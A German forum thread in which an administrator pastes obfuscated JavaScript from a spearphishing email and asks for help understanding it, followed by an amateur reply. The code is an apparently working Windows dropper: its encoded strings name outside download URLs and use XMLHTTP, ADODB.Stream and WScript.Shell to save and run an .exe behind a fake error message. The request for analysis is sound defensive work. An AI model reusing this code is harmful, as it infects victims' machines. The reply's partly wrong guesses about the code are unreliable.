Javascript Malware

#1
Guten Abend, vor ein paar Tagen tauchte in einer Spearphishing Mail die einer unserer Mitarbeiter erhielt dieser Schadcode auf, den er leider auch ausführte.
Kann mir jemand ungefähr sagen wobei es sich darum handelt? Ich selbst bin Systemintegrator und hier hört meine Kompetenz leider absolut auf.

Ich kann (leider) nicht den ganzen Code anhängen, das wäre zu lang mit 738 Zeilen, aber ich hänge ihn als txt an.
Danke schon einmal für sämtliche Vorschläge oder Ideen.




var a = ['\x56\x58\x6c\x50\x56\x31\x63\x3d', '\x64\x6d\x78\x54\x53\x6d\x67\x3d', '\x59\x6d\x78\x77\x59\x6c\x45\x3d', '\x5a\x48\x46\x71\x52\x30\x38\x3d', '\x65\x6c\x6c\x7a\x62\x57\x49\x3d', '\x62\x58\x68\x42\x56\x6d\x6f\x3d', '\x59\x57\x68\x34\x56\x30\x49\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x79\x5a\x57\x46\x30\x4c\x6d\x4e\x73\x4c\x32\x39\x79\x64\x48\x56\x36\x59\x58\x49\x75\x59\x32\x77\x76\x4d\x56\x39\x42\x59\x53\x38\x3d', '\x61\x30\x70\x77\x52\x57\x34\x3d', '\x57\x55\x5a\x53\x5a\x6b\x45\x3d', '\x56\x56\x70\x54\x53\x33\x55\x3d', '\x53\x48\x52\x61\x53\x33\x6b\x3d', '\x57\x45\x52\x6c\x56\x31\x6f\x3d', '\x51\x57\x74\x77\x5a\x47\x49\x3d', '\x62\x46\x68\x44\x57\x6d\x63\x3d', '\x55\x6e\x64\x70\x56\x30\x63\x3d', '\x5a\x56\x42\x56\x54\x56\x41\x3d', '\x51\x6c\x4a\x79\x57\x57\x30\x3d', '\x59\x31\x64\x4a\x52\x6b\x6b\x3d', '\x61\x6d\x64\x4d\x51\x58\x6f\x3d', '\x54\x30\x64\x6a\x65\x48\x67\x3d', '\x55\x32\x68\x61\x63\x46\x6b\x3d', '\x65\x56\x42\x6d\x55\x57\x30\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x79\x5a\x69\x35\x6d\x63\x69\x39\x6a\x63\x33\x4d\x76\x53\x31\x39\x31\x54\x79\x38\x3d', '\x52\x45\x46\x4f\x64\x58\x67\x3d', '\x56\x48\x4e\x6d\x51\x31\x59\x3d', '\x4e\x48\x77\x77\x66\x44\x56\x38\x4d\x58\x77\x79\x66\x44\x4e\x38\x4e\x33\x77\x32', '\x54\x47\x31\x71\x63\x46\x59\x3d', '\x56\x46\x4a\x6b\x59\x6b\x59\x3d', '\x55\x31\x4a\x74\x62\x6d\x45\x3d', '\x59\x57\x70\x51\x56\x31\x49\x3d', '\x53\x32\x56\x5a\x56\x57\x63\x3d', '\x59\x6e\x52\x69\x62\x46\x59\x3d', '\x52\x6b\x4e\x78\x54\x6d\x6b\x3d', '\x56\x46\x70\x4d\x52\x33\x55\x3d', '\x54\x58\x4a\x30\x52\x55\x55\x3d', '\x5a\x48\x4a\x75\x64\x58\x63\x3d', '\x56\x56\x56\x5a\x52\x55\x6f\x3d', '\x62\x31\x46\x4e\x62\x58\x41\x3d', '\x54\x57\x6c\x30\x52\x6e\x59\x3d', '\x61\x56\x64\x57\x65\x6c\x41\x3d', '\x54\x48\x6c\x45\x59\x56\x55\x3d', '\x63\x56\x4e\x36\x55\x57\x6b\x3d', '\x57\x45\x5a\x59\x55\x46\x55\x3d', '\x57\x6b\x46\x5a\x5a\x58\x55\x3d', '\x62\x47\x64\x50\x61\x33\x41\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x35\x6c\x65\x48\x56\x7a\x61\x57\x35\x6d\x62\x33\x49\x75\x59\x32\x39\x74\x4c\x32\x6c\x74\x5a\x79\x39\x45\x58\x30\x4d\x76', '\x5a\x30\x70\x6b\x56\x57\x34\x3d', '\x56\x6b\x4a\x69\x51\x57\x63\x3d', '\x61\x30\x68\x6f\x64\x55\x51\x3d', '\x65\x48\x46\x47\x53\x6d\x6f\x3d', '\x54\x30\x52\x57\x62\x30\x67\x3d', '\x5a\x48\x6c\x69\x64\x58\x67\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x56\x6b\x59\x57\x35\x6b\x64\x48\x4a\x70\x63\x32\x67\x75\x59\x32\x39\x74\x4c\x32\x4a\x73\x64\x57\x55\x76\x4e\x6c\x39\x6b\x4c\x77\x3d\x3d', '\x59\x32\x64\x72\x54\x48\x4d\x3d', '\x62\x57\x35\x4f\x64\x45\x49\x3d', '\x56\x57\x4a\x72\x64\x6c\x55\x3d', '\x52\x31\x64\x78\x55\x6d\x4d\x3d', '\x52\x58\x42\x78\x61\x47\x6b\x3d', '\x52\x45\x6c\x69\x63\x6d\x59\x3d', '\x62\x48\x70\x7a\x65\x55\x55\x3d', '\x51\x56\x4e\x31\x61\x31\x6b\x3d', '\x54\x48\x4e\x32\x56\x6b\x51\x3d', '\x57\x46\x6c\x42\x55\x30\x4d\x3d', '\x62\x6c\x4e\x34\x62\x6c\x41\x3d', '\x62\x45\x46\x54\x51\x56\x45\x3d', '\x64\x46\x6c\x4d\x55\x6d\x4d\x3d', '\x61\x32\x70\x73\x52\x6d\x63\x3d', '\x62\x33\x52\x72\x59\x6d\x51\x3d', '\x63\x33\x42\x73\x61\x58\x51\x3d', '\x54\x33\x42\x6c\x62\x67\x3d\x3d', '\x56\x33\x4a\x70\x64\x47\x55\x3d', '\x55\x47\x39\x7a\x61\x58\x52\x70\x62\x32\x34\x3d', '\x55\x32\x46\x32\x5a\x56\x52\x76\x52\x6d\x6c\x73\x5a\x51\x3d\x3d', '\x56\x48\x6c\x77\x5a\x51\x3d\x3d', '\x51\x32\x78\x76\x63\x32\x55\x3d', '\x57\x6b\x39\x73\x56\x45\x34\x3d', '\x57\x57\x35\x53\x5a\x48\x51\x3d', '\x53\x6c\x68\x51\x57\x6d\x51\x3d', '\x63\x55\x46\x31\x52\x32\x38\x3d', '\x59\x55\x39\x4b\x5a\x56\x59\x3d', '\x59\x57\x78\x33\x52\x6b\x55\x3d', '\x62\x6c\x56\x36\x61\x31\x4d\x3d', '\x54\x56\x46\x6d\x59\x56\x6b\x3d', '\x55\x58\x68\x48\x53\x31\x6b\x3d', '\x56\x33\x64\x73\x54\x48\x41\x3d', '\x65\x47\x74\x47\x57\x57\x30\x3d', '\x62\x31\x56\x33\x57\x6b\x51\x3d', '\x56\x32\x5a\x6f\x53\x6e\x49\x3d', '\x57\x6c\x6c\x46\x55\x56\x49\x3d', '\x5a\x32\x56\x4d\x63\x33\x4d\x3d', '\x61\x46\x56\x4f\x61\x32\x6b\x3d', '\x5a\x55\x6c\x46\x65\x6b\x59\x3d', '\x5a\x6c\x70\x32\x56\x32\x6b\x3d', '\x64\x45\x31\x5a\x55\x47\x4d\x3d', '\x56\x57\x35\x76\x59\x56\x49\x3d', '\x59\x6b\x56\x6e\x52\x30\x34\x3d', '\x63\x33\x68\x6c\x61\x47\x63\x3d', '\x64\x56\x42\x75\x55\x47\x59\x3d', '\x51\x55\x64\x33\x5a\x57\x67\x3d', '\x64\x55\x5a\x71\x61\x32\x67\x3d', '\x51\x6b\x4a\x72\x63\x6b\x38\x3d', '\x54\x32\x68\x43\x64\x56\x6b\x3d', '\x51\x57\x35\x50\x63\x30\x34\x3d', '\x59\x6c\x46\x6b\x52\x56\x6b\x3d', '\x55\x31\x46\x48\x64\x47\x63\x3d', '\x54\x6c\x6c\x75\x62\x6d\x6b\x3d', '\x54\x6d\x31\x76\x51\x57\x6f\x3d', '\x56\x46\x70\x78\x61\x45\x77\x3d', '\x53\x6c\x4a\x7a\x63\x56\x63\x3d', '\x51\x6b\x74\x47\x52\x45\x6f\x3d', '\x65\x6e\x46\x47\x54\x47\x67\x3d', '\x5a\x32\x56\x69\x59\x32\x6b\x3d', '\x51\x30\x78\x79\x53\x55\x55\x3d', '\x51\x6d\x4a\x58\x5a\x30\x34\x3d', '\x5a\x33\x6c\x71\x63\x48\x67\x3d', '\x62\x6d\x39\x4d\x62\x32\x38\x3d', '\x61\x32\x6c\x32\x61\x45\x45\x3d', '\x62\x56\x46\x79\x52\x48\x41\x3d', '\x63\x6b\x4a\x69\x53\x47\x77\x3d', '\x56\x6d\x35\x70\x53\x30\x59\x3d', '\x55\x57\x64\x49\x55\x57\x30\x3d', '\x64\x45\x5a\x73\x55\x45\x51\x3d', '\x54\x47\x5a\x42\x63\x6e\x6b\x3d', '\x51\x55\x52\x6b\x52\x6e\x49\x3d', '\x61\x6e\x5a\x77\x59\x58\x51\x3d', '\x57\x47\x39\x4b\x54\x55\x6b\x3d', '\x63\x57\x39\x55\x55\x32\x77\x3d', '\x59\x58\x64\x50\x64\x48\x6b\x3d', '\x56\x47\x70\x32\x55\x6e\x51\x3d', '\x53\x58\x5a\x34\x64\x31\x6b\x3d', '\x5a\x57\x46\x75\x52\x48\x6f\x3d', '\x5a\x47\x31\x55\x62\x6b\x6f\x3d', '\x63\x6d\x46\x75\x5a\x47\x39\x74', '\x64\x47\x39\x54\x64\x48\x4a\x70\x62\x6d\x63\x3d', '\x63\x33\x56\x69\x63\x33\x52\x79', '\x52\x32\x56\x30\x55\x33\x42\x6c\x59\x32\x6c\x68\x62\x45\x5a\x76\x62\x47\x52\x6c\x63\x67\x3d\x3d', '\x52\x6d\x70\x46\x54\x56\x67\x3d', '\x63\x48\x4e\x7a\x55\x47\x4d\x3d', '\x56\x32\x31\x50\x62\x6d\x77\x3d', '\x59\x55\x5a\x32\x64\x6e\x41\x3d', '\x5a\x32\x74\x70\x54\x30\x30\x3d', '\x63\x57\x78\x6d\x52\x56\x45\x3d', '\x56\x47\x31\x79\x53\x55\x55\x3d', '\x65\x6e\x4e\x54\x5a\x47\x30\x3d', '\x53\x48\x4e\x6c\x55\x30\x55\x3d', '\x57\x6e\x4a\x4c\x61\x6e\x51\x3d', '\x59\x6c\x46\x55\x61\x56\x55\x3d', '\x65\x6c\x6c\x78\x5a\x57\x77\x3d', '\x5a\x31\x56\x46\x64\x45\x30\x3d', '\x64\x46\x68\x76\x52\x56\x55\x3d', '\x52\x58\x4a\x43\x57\x6b\x6b\x3d', '\x52\x56\x42\x59\x62\x6d\x34\x3d', '\x54\x6b\x46\x30\x65\x48\x41\x3d', '\x59\x33\x42\x7a\x63\x46\x67\x3d', '\x63\x58\x70\x49\x64\x48\x41\x3d', '\x62\x6b\x74\x56\x54\x48\x49\x3d', '\x52\x6c\x68\x4b\x64\x6e\x59\x3d', '\x5a\x55\x52\x71\x62\x47\x4d\x3d', '\x52\x55\x5a\x71\x61\x56\x6f\x3d', '\x53\x30\x78\x5a\x62\x55\x45\x3d', '\x63\x6b\x6c\x44\x53\x47\x55\x3d', '\x63\x58\x68\x71\x63\x56\x55\x3d', '\x64\x31\x4a\x6b\x51\x57\x30\x3d', '\x65\x47\x78\x79\x63\x55\x51\x3d', '\x53\x6b\x52\x30\x57\x6c\x41\x3d', '\x64\x6e\x64\x5a\x61\x56\x67\x3d', '\x64\x6b\x35\x5a\x56\x30\x34\x3d', '\x53\x47\x5a\x59\x57\x6c\x67\x3d', '\x5a\x48\x5a\x48\x65\x45\x59\x3d', '\x56\x56\x52\x72\x57\x6c\x6b\x3d', '\x53\x30\x74\x54\x59\x6b\x51\x3d', '\x65\x55\x74\x6a\x55\x45\x55\x3d', '\x63\x56\x68\x32\x5a\x47\x73\x3d', '\x54\x57\x46\x44\x61\x31\x63\x3d', '\x4e\x33\x77\x7a\x66\x44\x46\x38\x4e\x48\x77\x31\x66\x44\x42\x38\x4e\x6e\x77\x79', '\x64\x33\x4e\x48\x63\x6d\x63\x3d', '\x51\x32\x64\x56\x63\x32\x4d\x3d', '\x64\x46\x6c\x36\x63\x45\x4d\x3d', '\x62\x30\x5a\x70\x54\x32\x51\x3d', '\x4d\x48\x77\x7a\x66\x44\x46\x38\x4e\x58\x77\x79\x66\x44\x51\x3d', '\x55\x46\x4a\x76\x62\x30\x63\x3d', '\x64\x6e\x42\x55\x52\x45\x49\x3d', '\x56\x47\x68\x6c\x63\x6d\x55\x67\x64\x32\x46\x7a\x49\x47\x46\x75\x49\x47\x56\x79\x63\x6d\x39\x79\x49\x47\x39\x77\x5a\x57\x35\x70\x62\x6d\x63\x67\x64\x47\x68\x70\x63\x79\x42\x6b\x62\x32\x4e\x31\x62\x57\x56\x75\x64\x43\x34\x67\x56\x47\x68\x6c\x49\x47\x5a\x70\x62\x47\x55\x67\x61\x58\x4d\x67\x5a\x47\x46\x74\x59\x57\x64\x6c\x5a\x43\x42\x68\x62\x6d\x51\x67\x59\x32\x39\x31\x62\x47\x51\x67\x62\x6d\x39\x30\x49\x47\x4a\x6c\x49\x48\x4a\x6c\x63\x47\x46\x70\x63\x6d\x56\x6b\x49\x43\x68\x6d\x62\x33\x49\x67\x5a\x58\x68\x68\x62\x58\x42\x73\x5a\x53\x77\x67\x61\x58\x51\x67\x64\x32\x46\x7a\x49\x48\x4e\x6c\x62\x6e\x51\x67\x59\x58\x4d\x67\x59\x57\x34\x67\x5a\x57\x31\x68\x61\x57\x77\x67\x59\x58\x52\x30\x59\x57\x4e\x6f\x62\x57\x56\x75\x64\x43\x42\x68\x62\x6d\x51\x67\x64\x32\x46\x7a\x62\x69\x64\x30\x49\x47\x4e\x76\x63\x6e\x4a\x6c\x59\x33\x52\x73\x65\x53\x42\x6b\x5a\x57\x4e\x76\x5a\x47\x56\x6b\x4b\x53\x34\x3d', '\x63\x30\x70\x72\x53\x31\x4d\x3d', '\x57\x47\x35\x4b\x55\x33\x6b\x3d', '\x51\x6e\x56\x31\x63\x58\x55\x3d', '\x54\x6d\x39\x30\x49\x46\x4e\x31\x63\x48\x42\x76\x63\x6e\x52\x6c\x5a\x43\x42\x47\x61\x57\x78\x6c\x49\x45\x5a\x76\x63\x6d\x31\x68\x64\x41\x3d\x3d', '\x51\x6e\x70\x48\x54\x31\x45\x3d', '\x55\x47\x39\x77\x64\x58\x41\x3d', '\x51\x33\x4a\x6c\x59\x58\x52\x6c\x54\x32\x4a\x71\x5a\x57\x4e\x30', '\x53\x45\x52\x46\x56\x32\x73\x3d', '\x53\x6d\x56\x72\x5a\x58\x6f\x3d', '\x56\x31\x4e\x6a\x63\x6d\x6c\x77\x64\x43\x35\x54\x61\x47\x56\x73\x62\x41\x3d\x3d', '\x64\x30\x56\x58\x55\x6b\x67\x3d', '\x52\x6c\x4a\x75\x62\x6d\x30\x3d', '\x64\x47\x64\x4b\x52\x32\x55\x3d', '\x62\x57\x4e\x77\x51\x6b\x49\x3d', '\x55\x45\x68\x46\x53\x6d\x77\x3d', '\x54\x56\x4e\x59\x54\x55\x77\x79\x4c\x6c\x68\x4e\x54\x45\x68\x55\x56\x46\x41\x3d', '\x53\x33\x70\x5a\x52\x55\x55\x3d', '\x52\x30\x56\x55', '\x65\x48\x4e\x36\x64\x58\x49\x3d', '\x61\x45\x4a\x6e\x5a\x57\x59\x3d', '\x65\x6e\x52\x44\x56\x31\x4d\x3d', '\x51\x58\x52\x68\x63\x56\x59\x3d', '\x57\x55\x5a\x6f\x65\x55\x77\x3d', '\x52\x45\x64\x55\x51\x6c\x67\x3d', '\x64\x47\x56\x54\x63\x6b\x49\x3d', '\x56\x6d\x6c\x4e\x57\x46\x63\x3d', '\x57\x6e\x5a\x4c\x52\x58\x67\x3d', '\x54\x6b\x64\x33\x65\x48\x63\x3d', '\x52\x57\x39\x55\x5a\x46\x6f\x3d', '\x5a\x55\x68\x30\x57\x6c\x6b\x3d', '\x62\x33\x42\x6c\x62\x67\x3d\x3d', '\x63\x32\x56\x75\x5a\x41\x3d\x3d', '\x63\x33\x52\x68\x64\x48\x56\x7a', '\x55\x6d\x56\x7a\x63\x47\x39\x75\x63\x32\x56\x43\x62\x32\x52\x35', '\x55\x6e\x56\x75', '\x59\x30\x78\x75\x64\x48\x4d\x3d', '\x56\x58\x42\x58\x57\x58\x6b\x3d', '\x54\x46\x5a\x79\x63\x48\x41\x3d', '\x56\x33\x42\x6c\x62\x6b\x77\x3d', '\x55\x32\x4e\x79\x61\x58\x42\x30\x61\x57\x35\x6e\x4c\x6b\x5a\x70\x62\x47\x56\x54\x65\x58\x4e\x30\x5a\x57\x31\x50\x59\x6d\x70\x6c\x59\x33\x51\x3d', '\x53\x57\x52\x70\x53\x30\x51\x3d', '\x59\x6b\x52\x61\x55\x47\x6b\x3d', '\x61\x33\x4e\x75\x56\x6b\x4d\x3d', '\x4c\x6d\x56\x34\x5a\x51\x3d\x3d', '\x62\x47\x56\x4b\x53\x33\x6f\x3d', '\x4e\x6e\x77\x7a\x66\x44\x46\x38\x4d\x6e\x77\x31\x66\x44\x42\x38\x4e\x48\x77\x33', '\x54\x31\x64\x79\x52\x32\x38\x3d', '\x51\x55\x52\x50\x52\x45\x49\x75\x55\x33\x52\x79\x5a\x57\x46\x74', '\x64\x45\x4e\x74\x59\x57\x55\x3d', '\x62\x6b\x68\x46\x64\x45\x38\x3d', '\x64\x6d\x70\x73\x54\x56\x51\x3d', '\x5a\x57\x70\x33\x53\x6c\x45\x3d', '\x64\x30\x4a\x4d\x52\x47\x34\x3d', '\x63\x6b\x70\x72\x5a\x45\x38\x3d', '\x53\x57\x31\x49\x61\x46\x67\x3d', '\x57\x55\x64\x72\x52\x46\x49\x3d', '\x52\x6e\x46\x49\x62\x58\x55\x3d', '\x55\x30\x4a\x57\x55\x32\x59\x3d', '\x65\x6b\x5a\x68\x54\x55\x55\x3d', '\x54\x56\x52\x44\x62\x58\x59\x3d', '\x62\x48\x68\x61\x52\x58\x45\x3d', '\x61\x48\x52\x74\x64\x47\x34\x3d', '\x64\x6c\x42\x75\x53\x47\x30\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x31\x6c\x61\x57\x74\x7a\x4c\x6d\x52\x72\x4c\x31\x5a\x45\x59\x6c\x51\x74\x62\x6c\x6c\x66\x61\x56\x70\x34\x63\x55\x34\x74\x5a\x6b\x46\x34\x4c\x32\x64\x68\x58\x7a\x67\x76', '\x52\x45\x74\x77\x56\x6e\x4d\x3d', '\x62\x47\x68\x6f\x61\x6b\x63\x3d', '\x64\x6c\x70\x70\x65\x48\x45\x3d', '\x64\x48\x64\x31\x55\x57\x51\x3d', '\x62\x57\x39\x6d\x5a\x6d\x63\x3d', '\x54\x56\x68\x74\x52\x46\x63\x3d', '\x5a\x31\x64\x4c\x52\x30\x6b\x3d', '\x54\x55\x68\x51\x65\x6e\x6b\x3d', '\x64\x32\x52\x6f\x61\x47\x45\x3d', '\x63\x48\x56\x75\x63\x47\x51\x3d', '\x59\x57\x31\x46\x63\x46\x51\x3d', '\x51\x33\x42\x5a\x51\x32\x77\x3d', '\x53\x6d\x70\x30\x63\x55\x45\x3d', '\x5a\x58\x64\x44\x54\x58\x51\x3d', '\x53\x6b\x5a\x6e\x5a\x33\x51\x3d', '\x54\x57\x46\x50\x59\x6c\x63\x3d', '\x64\x45\x4e\x36\x52\x6e\x6b\x3d'];
(function(c, d) {
var e = function(f) {
while (--f) {
c['push'](c['shift']());
}
};
e(++d);
}(a, 0xbf));
var b = function(c, d) {
c = c - 0x0;
var e = a[c];
if (b['EalNRN'] === undefined) {
(function() {
var f;
try {
var g = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
f = g();
} catch (h) {
f = window;
}
var i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
f['atob'] || (f['atob'] = function(j) {
var k = String(j)['replace'](/=+$/, '');
for (var l = 0x0, m, n, o = 0x0, p = ''; n = k['charAt'](o++); ~n && (m = l % 0x4 ? m * 0x40 + n : n, l++ % 0x4) ? p += String['fromCharCode'](0xff & m >> (-0x2 * l & 0x6)) : 0x0) {
n = i['indexOf'](n);
}
return p;
});
}());
b['hVXgdv'] = function(q) {
var r = atob(q);
var s = [];
for (var t = 0x0, u = r['length']; t < u; t++) {
s += '%' + ('00' + r['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);
}
return decodeURIComponent(s);
};
b['xoXtXA'] = {};
b['EalNRN'] = !![];
}
var v = b['xoXtXA'][c];
if (v === undefined) {
e = b['hVXgdv'](e);
b['xoXtXA'][c] = e;
} else {
e = v;
}
return e;
};

function u(v, w) {
var x = {};
x[b('0x0')] = function(y, z, A) {
return y(z, A);
};
x[b('0x1')] = b('0x2');
x[b('0x3')] = function(B, C, D) {
return B(C, D);
};
x[b('0x4')] = function(E, F) {
return E === F;
};
x[b('0x5')] = b('0x6');
x[b('0x7')] = b('0x8');
x[b('0x9')] = b('0xa');
x[b('0xb')] = function(G, H) {
return G == H;
};
x[b('0xc')] = function(I, J) {
return I === J;
};
x[b('0xd')] = b('0xe');
x[b('0xf')] = b('0x10');
x[b('0x11')] = b('0x12');
x[b('0x13')] = function(K, L, M) {
return K(L, M);
};
x[b('0x14')] = function(N, O) {
return N !== O;
};
x[b('0x15')] = b('0x16');
try {
if (x[b('0x4')](x[b('0x5')], x[b('0x5')])) {
var P = new ActiveXObject(x[b('0x7')]);
P[b('0x17')](x[b('0x9')], v, ![]);
P[b('0x18')]();
if (x[b('0xb')](P[b('0x19')], 0xc8)) {
if (x[b('0xc')](x[b('0xd')], x[b('0xd')])) {
return x[b('0x3')](w, P[b('0x1a')], ![]);
} else {
return ![];
}
} else {
if (x[b('0xc')](x[b('0xf')], x[b('0x11')])) {
return x[b('0x0')](w, null, !![]);
} else {
return x[b('0x13')](w, null, !![]);
}
}
} else {
if (!error) {
try {
var p = new ActiveXObject(x[b('0x1')]);
p[b('0x1b')](path);
} catch (U) {}
}
}
} catch (V) {
if (x[b('0x14')](x[b('0x15')], x[b('0x15')])) {
return x[b('0x3')](w, P[b('0x1a')], ![]);
} else {
return x[b('0x13')](w, null, !![]);
}
}
}
 

Anhänge

beepsoft

Well-Known Member
c-b Team
c-b Experte
#2
Hallo,
also ich bin jetzt auch in keiner Weise mit Ahnung versehen.
Aber ganz grob auf den ersten Blick:
Code:
 var P = new ActiveXObject(x[b('0x7')]);
Ich vermute, dass hier ein Zugriff auf die Festplatte passiert.
Code:
     Res = WshShell[b('0x107')](Text, 0x0, Title, dK[b('0x102')](0x0, 0x40));
Hier wird ein Fenster erzeugt.
Also gibt es irgendeine Art von Interface.
Code:
return decodeURIComponent(s);
Hier wird vermutlich etwas verschlüsselt.
Code:
var a = ['\x56\x58\x6c\x50\x56\x31\x63\x3d', '\x64\x6d\x78\x54\x53\x6d\x67\x3d', '\x59\x6d\x78\x77\x59\x6c\x45\x3d', '\x5a\x48\x46\x71\x52\x30\x38\x3d', '\x65\x6c\x6c\x7a\x62\x57\x49\x3d', '\x62\x58\x68\x42\x56\x6d\x6f\x3d', '\x59\x57\x68\x34\x56\x30\x49\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x79\x5a\x57\x46\x30\x4c\x6d\x4e\x73\x4c\x32\x39\x79\x64\x48\x56\x36\x59\x58\x49\x75\x59\x32\x77\x76\x4d\x56\x39\x42\x59\x53\x38\x3d', '\x61\x30\x70\x77\x52\x57\x34\x3d', '\x57\x55\x5a\x53\x5a\x6b\x45\x3d', '\x56\x56\x70\x54\x53\x33\x55\x3d', '\x53\x48\x52\x61\x53\x33\x6b\x3d', '\x57\x45\x52\x6c\x56\x31\x6f\x3d', '\x51\x57\x74\x77\x5a\x47\x49\x3d', '\x62\x46\x68\x44\x57\x6d\x63\x3d', '\x55\x6e\x64\x70\x56\x30\x63\x3d', '\x5a\x56\x42\x56\x54\x56\x41\x3d', '\x51\x6c\x4a\x79\x57\x57\x30\x3d', '\x59\x31\x64\x4a\x52\x6b\x6b\x3d', '\x61\x6d\x64\x4d\x51\x58\x6f\x3d', '\x54\x30\x64\x6a\x65\x48\x67\x3d', '\x55\x32\x68\x61\x63\x46\x6b\x3d', '\x65\x56\x42\x6d\x55\x57\x30\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x64\x79\x5a\x69\x35\x6d\x63\x69\x39\x6a\x63\x33\x4d\x76\x53\x31\x39\x31\x54\x79\x38\x3d', '\x52\x45\x46\x4f\x64\x58\x67\x3d', '\x56\x48\x4e\x6d\x51\x31\x59\x3d', '\x4e\x48\x77\x77\x66\x44\x56\x38\x4d\x58\x77\x79\x66\x44\x4e\x38\x4e\x33\x77\x32', '\x54\x47\x31\x71\x63\x46\x59\x3d', '\x56\x46\x4a\x6b\x59\x6b\x59\x3d', '\x55\x31\x4a\x74\x62\x6d\x45\x3d', '\x59\x57\x70\x51\x56\x31\x49\x3d', '\x53\x32\x56\x5a\x56\x57\x63\x3d', '\x59\x6e\x52\x69\x62\x46\x59\x3d', '\x52\x6b\x4e\x78\x54\x6d\x6b\x3d', '\x56\x46\x70\x4d\x52\x33\x55\x3d', '\x54\x58\x4a\x30\x52\x55\x55\x3d', '\x5a\x48\x4a\x75\x64\x58\x63\x3d', '\x56\x56\x56\x5a\x52\x55\x6f\x3d', '\x62\x31\x46\x4e\x62\x58\x41\x3d', '\x54\x57\x6c\x30\x52\x6e\x59\x3d', '\x61\x56\x64\x57\x65\x6c\x41\x3d', '\x54\x48\x6c\x45\x59\x56\x55\x3d', '\x63\x56\x4e\x36\x55\x57\x6b\x3d', '\x57\x45\x5a\x59\x55\x46\x55\x3d', '\x57\x6b\x46\x5a\x5a\x58\x55\x3d', '\x62\x47\x64\x50\x61\x33\x41\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x35\x6c\x65\x48\x56\x7a\x61\x57\x35\x6d\x62\x33\x49\x75\x59\x32\x39\x74\x4c\x32\x6c\x74\x5a\x79\x39\x45\x58\x30\x4d\x76', '\x5a\x30\x70\x6b\x56\x57\x34\x3d', '\x56\x6b\x4a\x69\x51\x57\x63\x3d', '\x61\x30\x68\x6f\x64\x55\x51\x3d', '\x65\x48\x46\x47\x53\x6d\x6f\x3d', '\x54\x30\x52\x57\x62\x30\x67\x3d', '\x5a\x48\x6c\x69\x64\x58\x67\x3d', '\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x32\x56\x6b\x59\x57\x35\x6b\x64\x48\x4a\x70\x63\x32\x67\x75\x59\x32\x39\x74\x4c\x32\x4a\x73\x64\x57\x55\x76\x4e\x6c\x39\x6b\x4c\x77\x3d\x3d', '\x59\x32\x64\x72\x54\x48\x4d\x3d', '\x62\x57\x35\x4f\x64\x45\x49\x3d', '\x56\x57\x4a\x72\x64\x6c\x55\x3d', '\x52\x31\x64\x78\x55\x6d\x4d\x3d', '\x52\x58\x42\x78\x61\x47\x6b\x3d', '\x52\x45\x6c\x69\x63\x6d\x59\x3d', '\x62\x48\x70\x7a\x65\x55\x55\x3d', '\x51\x56\x4e\x31\x61\x31\x6b\x3d', '\x54\x48\x4e\x32\x56\x6b\x51\x3d', '\x57\x46\x6c\x42\x55\x30\x4d\x3d', '\x62\x6c\x4e\x34\x62\x6c\x41\x3d', '\x62\x45\x46\x54\x51\x56\x45\x3d', '\x64\x46\x6c\x4d\x55\x6d\x4d\x3d', '\x61\x32\x70\x73\x52\x6d\x63\x3d', '\x62\x33\x52\x72\x59\x6d\x51\x3d', '\x63\x33\x42\x73\x61\x58\x51\x3d', '\x54\x33\x42\x6c\x62\x67\x3d\x3d', '\x56\x33\x4a\x70\x64\x47\x55\x3d', '\x55\x47\x39\x7a\x61\x58\x52\x70\x62\x32\x34\x3d', '\x55\x32\x46\x32\x5a\x56\x52\x76\x52\x6d\x6c\x73\x5a\x51\x3d\x3d', '\x56\x48\x6c\x77\x5a\x51\x3d\x3d', '\x51\x32\x78\x76\x63\x32\x55\x3d', '\x57\x6b\x39\x73\x56\x45\x34\x3d', '\x57\x57\x35\x53\x5a\x48\x51\x3d', '\x53\x6c\x68\x51\x57\x6d\x51\x3d', '\x63\x55\x46\x31\x52\x32\x38\x3d', '\x59\x55\x39\x4b\x5a\x56\x59\x3d', '\x59\x57\x78\x33\x52\x6b\x55\x3d', '\x62\x6c\x56\x36\x61\x31\x4d\x3d', '\x54\x56\x46\x6d\x59\x56\x6b\x3d', '\x55\x58\x68\x48\x53\x31\x6b\x3d', '\x56\x33\x64\x73\x54\x48\x41\x3d', '\x65\x47\x74\x47\x57\x57\x30\x3d', '\x62\x31\x56\x33\x57\x6b\x51\x3d', '\x56\x32\x5a\x6f\x53\x6e\x49\x3d', '\x57\x6c\x6c\x46\x55\x56\x49\x3d', '\x5a\x32\x56\x4d\x63\x33\x4d\x3d', '\x61\x46\x56\x4f\x61\x32\x6b\x3d', '\x5a\x55\x6c\x46\x65\x6b\x59\x3d', '\x5a\x6c\x70\x32\x56\x32\x6b\x3d', '\x64\x45\x31\x5a\x55\x47\x4d\x3d', '\x56\x57\x35\x76\x59\x56\x49\x3d', '\x59\x6b\x56\x6e\x52\x30\x34\x3d', '\x63\x33\x68\x6c\x61\x47\x63\x3d', '\x64\x56\x42\x75\x55\x47\x59\x3d', '\x51\x55\x64\x33\x5a\x57\x67\x3d', '\x64\x55\x5a\x71\x61\x32\x67\x3d', '\x51\x6b\x4a\x72\x63\x6b\x38\x3d', '\x54\x32\x68\x43\x64\x56\x6b\x3d', '\x51\x57\x35\x50\x63\x30\x34\x3d', '\x59\x6c\x46\x6b\x52\x56\x6b\x3d', '\x55\x31\x46\x48\x64\x47\x63\x3d', '\x54\x6c\x6c\x75\x62\x6d\x6b\x3d', '\x54\x6d\x31\x76\x51\x57\x6f\x3d', '\x56\x46\x70\x78\x61\x45\x77\x3d', '\x53\x6c\x4a\x7a\x63\x56\x63\x3d', '\x51\x6b\x74\x47\x52\x45\x6f\x3d', '\x65\x6e\x46\x47\x54\x47\x67\x3d', 